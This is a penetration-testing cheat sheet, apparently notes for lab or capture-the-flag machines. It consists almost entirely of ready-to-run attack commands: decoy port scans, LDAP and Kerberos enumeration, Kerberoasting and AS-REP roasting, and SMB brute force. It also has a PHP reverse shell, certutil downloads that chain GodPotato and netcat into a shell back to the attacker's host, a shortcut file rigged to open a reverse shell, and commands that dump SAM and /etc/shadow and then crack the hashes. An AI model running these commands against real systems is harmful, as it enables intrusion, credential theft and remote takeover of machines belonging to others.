# Environment Variables
## export
export TARGET="$TARGET"
export KRB5CCNAME='/home/user/VICTIM@dc01@EXAMPLE.COM.ccache'

# Commands and Navigation
## Windows
## Linux
cat /etc/passwd | grep -vE 'nologin|false' | cut -d ':' -f '1'

# Host Discovery
## External
sudo nmap -Pn -n -sT "$TARGET" -p- -D 1.1.1.1 -g53 --min-rate 500 --max-rate 1500 --spoof-mac 6C45C4
sudo nmap -Pn -n -sU "$TARGET" -p- -D 1.1.1.1 -g53 --min-rate 500 --max-rate 1500 --spoof-mac 6C45C4

## Internal
sudo nmap -Pn -n -sT "$TARGET" -p- -D 1.1.1.1 -g53 --min-rate 500 --max-rate 1500 --spoof-mac 6C45C4
sudo nmap -Pn -n -sU "$TARGET" -p- -D 1.1.1.1 -g53 --min-rate 500 --max-rate 1500 --spoof-mac 6C45C4

# Service Enumeration
## Nmap All Scripts
sudo nmap -Pn -n -sC "$TARGET" -p22,80,445 -D 1.1.1.1 -g53 --min-rate 500 --max-rate 1500 --spoof-mac 6C45C4

## LDAP
nmap --script "ldap* and not brute" -p 389 "$TARGET"
ldapsearch -H ldap://"$TARGET" -x -s base namingcontexts
ldapsearch -H ldap://"$TARGET" -x -b "DC=xxxxxx,DC=xxx" "(objectClass=*)"
ldapsearch -H ldap://"$TARGET" -x -b "DC=xxxxxx,DC=xxx" "(objectClass=*)" | grep -oP '(?<=dn: ).*' | grep -oP '(^[^@]+)'
ldapsearch -H ldap://"$TARGET" -x -b "DC=xxxxxx,DC=xxx" "(objectClass=*)" | grep -oP '(?<=userPrincipalName: ).*' | grep -oP '(^[^@]+)'
ldapsearch -H ldap://"$TARGET" -x -b "DC=xxxxxx,DC=xxx" "(objectClass=*)" | grep -oP '(?<=description: ).*'
ldapsearch -H ldap://$DC/ -D "$DOM\P.Rosa" -w 'Rosaisbest123' -b "" -s base "(objectClass=*)" | grep -v 'supported'
ldapsearch -H ldap://$DC/ -D "$DOM\P.Rosa" -w 'Rosaisbest123' -b "DC=xxxxxx,DC=xxx" "(objectClass=*)" "*" | grep 'SAM' -B 4 -A 3

## Kerberos
impacket-getST -spn $DC $DOM/'USERNAME':'PASSWORD'

nano /etc/krb5.conf
[libdefaults]
default_realm = $DOM
dns_lookup_kdc = true
dns_lookup_realm = false
[realms]
$DOM = {
    kdc = $DC
    admin_server = $DC
}
[domain_realm]
.$DOM = $DOM
$DOM = $DOM

export KRB5CCNAME='/home/me/USERNAME@dc01@VINTAGE.HTB.ccache'
kinit -c '/home/me/USERNAME@dc01@VINTAGE.HTB.ccache' 'USERNAME@VINTAGE.HTB'
klist

impacket-GetADUsers -dc-host $DC -k $DOM/
impacket-GetNPUsers -usersfile usernames $DOM/ -dc-ip "$TARGET"
impacket-GetUserSPNs -request-user anna -dc-ip "$TARGET" $DOM/username:password
impacket-GetUserSPNs -no-preauth anna -usersfile usernames -dc-host "$TARGET" $DOM/
impacket-GetUserSPNs -request -dc-ip "$TARGET" $DOM/username:password

## FTP
nxc ftp "$TARGET" --port 21 -u 'anonymous' -p 'anonymous' --ls
ftp "$TARGET"
anonymous
anonymous
ls -a
binary
ascii

## SMB
impacket-samrdump "$TARGET"
nxc smb "$TARGET" -u usernames -p passwords --rid-brute 10000
nxc smb "$TARGET" -u usernames -p passwords --shares
msfconsole -q -x "use auxiliary/scanner/smb/smb_login; set RHOSTS $TARGET; set SMBUser $USERNAME; set SMBPass $PASSWORD; set CreateSession true; run"
sessions -i 1
shares -i C$
cd programdata
upload nc.exe
impacket-smbclient $DOM/'user':'password'@$TARGET
shares
use

## MySQL
mysql -h "$TARGET" -u root@localhost -e 'show databases;'

## NFS Mounts
for x in $(showmount -e "$TARGET" | awk '{print $1}' | grep -v 'Export')
    do mkdir -p "/dev/shm"/mnt"$x"
    sudo mount -t nfs "$TARGET":"$x" "/dev/shm"/mnt"$x" -o nolock
    tree -puga "/dev/shm"/mnt"$x"
done
sudo adduser -u 1002 mntuser
sudo usermod -u 1003 mntuser
setpriv --reuid=1002 --regid=1002 --clear-groups -- ls -laR


# Web Enumeration
## Technology Discovery
whatweb http://$TARGET

## WAF Discovery
wafw00f http://$TARGET

## WordPress Discovery
wpscan --url http://$TARGET/wordpress --enumerate
Download source > https://develop.svn.wordpress.org/tags/x.x.x/src/

## Directory Discovery
[*] ffuf
ffuf -u http://"$TARGET"/FUZZ -t 800 -rate 20000 \
-e txt,pdf,conf,config,cnf,html,php,asp,aspx,js \
-v -recursion -recursion-depth 2 \
-w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt \
2>/dev/null | grep -oP '(http.*)(?<!/)$'
[*] feroxbuster
feroxbuster -u http://$TARGET \
-w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt \
-d 4 -k -C 404 \
-x pdf txt bak backup conf config cnf php asp aspx js \
--dont-scan '(?i)(vendor|img|.*(min|gif|css|images|png|jpg)$)'


## Directory Traversal
ffuf -u 'http://$TARGET/nav.php?page=FUZZ' -t 400 -rate 10000 -v -mc 200 \
-w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt \
2>/dev/null | grep -oP '(http.*)(?<!/)$'

## XSS + SSTI
<img src=x>'"${{7*7}}

## Subdomain Discovery
gobuster vhost --append-domain -u $DOM -k -r -t200 -q \
-w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt \
| grep -oP '(?<=Found: )[^ ]+'


# Exploitation
## Reverse Shell Listeners
nc -lvnp 4444
msfconsole -q -x "use multi/handler; set LHOST $MYIP; set LPORT 4444; run"

## Reverse Shells
<?php
    $lhost = "$MYIP";
    $lport = 4444;
    
    exec("bash -c 'bash -i >& /dev/tcp/$lhost/$lport 0>&1'");
    $sock = fsockopen($lhost, $lport);
    if ($sock) {
        exec("sh <&3 >&3 2>&3");
        }
?>

## Upgrade TTY
python3 -c 'import pty; pty.spawn("/bin/bash")';
CTRL-Z
stty size;stty raw -echo;fg
export SHELL=bash;
export TERM=xterm-256color;
stty rows <num> columns <num>
reset

## SSH
ssh-keygen -f sshkey -N ''; cat sshkey.pub
echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINzZbkLBUl5mk0AW8lPkWRXrupSiydDr8GJauiEAu3Ze' > $TARGET ~/.ssh/authorized_keys
ssh-add -D
bob@$TARGET -i sshkey.pub
bob@$TARGET

## Windows MSHTA - Metasploit
msfconsole -q -x "use exploit/windows/misc/hta_server; set LHOST $MYIP; set SRVHOST $MYIP; run"
mshta.exe http://$MYIP:8080/nZzLAD.hta
sessions -i 1

## RDP
xfreerdp /v:'$TARGET' -sec-nla /tls-seclevel:0 /dynamic-resolution +clipboard
xfreerdp /u:'bob' /p:'pass123' /v:'$TARGET' /tls-seclevel:0 /dynamic-resolution +clipboard


## MSSQL
[*] nc.exe
netexec mssql $TARGET -u sa -p 'MSSQLP@ssw0rd!' --local-auth -X 'certutil -urlcache -f http://$MYIP:8088/runascs.exe C:\programdata\runascs.exe;certutil -urlcache -f http://$MYIP:8088/nc.exe C:\programdata\nc.exe; certutil -urlcache -f http://$MYIP:8088/GodPotato-NET4.exe C:\programdata\GodPotato-NET4.exe; C:\programdata\runascs.exe sql_svc WqSZAF6CysDQbGb3 --logon-type 5 -b "C:\programdata\GodPotato-NET4.exe -cmd \"cmd /c C:\programdata\nc.exe -e cmd.exe $MYIP 4444\""'
[*] mshta.exe
netexec mssql $TARGET -u sa -p 'MSSQLP@ssw0rd!' --local-auth -X 'certutil -urlcache -f http://$MYIP:8088/runascs.exe C:\programdata\runascs.exe;certutil -urlcache -f http://$MYIP:8088/nc.exe C:\programdata\nc.exe; certutil -urlcache -f http://$MYIP:8088/GodPotato-NET4.exe C:\programdata\GodPotato-NET4.exe; C:\programdata\runascs.exe sql_svc WqSZAF6CysDQbGb3 --logon-type 5 -b "cmd /c mshta.exe http://$MYIP:8080/cf9J5o.hta"'
sessions -i 1 -c 'C:\programdata\GodPotato-NET4.exe -cmd "cmd /c whoami /priv"'
sessions -i 1 -C 'getsystem'
sessions -i 1

## impacket
impacket-changepasswd -debug -dc-ip $TARGET $DC/"$USERNAME":"$PASSWORD"@$TARGET -newpass 'NewPassword123!'

## Git
git add shell.*;git commit -m 'added';git push http://43ce39bb0bd6bc489284f2905f033ca467a6362f@$TARGET:3000/$USERNAME/website.git

## curl - file upload (PUT)
curl --upload-file shell.php http://$TARGET:80/upload/

# Post Exploitation 

## Linux
ssh bob@$TARGET -i sshkey.pub -L 33060:Localhost:33060 -L 5000:Localhost:5000
netstat -tuln
ls -la /opt
sudo -l
find / -perm /4000 2>/dev/null
grep -r -E 'conf' /var/www
cat ~/.ssh/id_rsa
cat /etc/shadow
curl $TARGET:8088/linpeas.sh | bash

## Windows
[*] Enumeration
powershell -c "Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher"
cd C:\ & dir /S /B SAM == SYSTEM == SAM.* == SYSTEM.*
icacls C:\Windows\System32\Config
whoami /priv
cd C:\users; tree /f
wmic useraccount get name,sid
powershell -c "Set-ExecutionPolicy unrestricted"

[*] nxc
nxc winrm $TARGET -u '$USERNAME' -p '$PASSWORD' --sam --dump-method powershell


[*] SAM NTLM
cd c:\programdata; reg save hklm\sam SAM; reg save hklm\system SYSTEM;
download SAM
download SYSTEM
impacket-secretsdump LOCAL -sam SAM -system SYSTEM
echo 'Administrator:500:...................' > hashes
hashcat -m 1000 -a 0 hashes rockyou


[*] SeBackupPrivilege
robocopy /b \Users\Administrator\Desktop .


[*] File Transfer
python3 -m http.server -d Downloads/upload/windows 8088
powershell -c "certutil -urlcache -f http://$MYIP:8088/winpeas.exe C:\programdata\winpeas.exe"
powershell -c "certutil -urlcache -f http://$MYIP:8088/nc.exe C:\programdata\nc.exe"

[*] Rubeus
Rubeus.exe kerberoast
nano hashes; cat hashes | awk '{$1=$1}1' | tr -d '\n' | tee hashes; john hashes -w=rockyou --format=krb5tgs
Rubeus.exe asreproast
nano hashes; cat hashes | awk '{$1=$1}1' | tr -d '\n' | tee hashes; john hashes -w=rockyou --format=krb5asrep

[*] evil-winrm
evil-winrm -i "$TARGET" -u 'username' -p 'password'
evil-winrm -i "$TARGET" -u 'username' -H 'hash'

[*] url / .lnk exploits
click.url
[InternetShortcut]
URL=C:\programdata\shell.bat

[Notepad.lnk - Inject Reverse Shell]
powershell "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Common Applications\Notepad.lnk');$s.TargetPath='C:\Windows\System32\cmd.exe';$s.Arguments='/c \"C:\ProgramData\nc.exe $MYIP 4444 -e cmd\"';$s.Save()"

[*] Metasploit
meterpreter > use priv
meterpreter > getsystem

[*] Powerview
powershell -c "certutil -urlcache -f http://$MYIP:8088/powerview.ps1 C:\programdata\powerview.ps1"
powershell Import-Module C:\programdata\powerview.ps1
Get-NetDomain
Get-LocalUser
Set-DomainObject -Identity USERNAME -SET @{serviceprincipalname='SET/SET'}; Get-DomainSPNTicket -spn SET/SET

[*] bloodhound-python
bloodhound-python -c all -u 'username' -p 'password' -d "$DOM" -dc "$DC" -ns "$TARGET"
bloodhound-python -c default -u 'username' -p 'password' -d "$DOM" -dc "$DC" -ns "$TARGET"
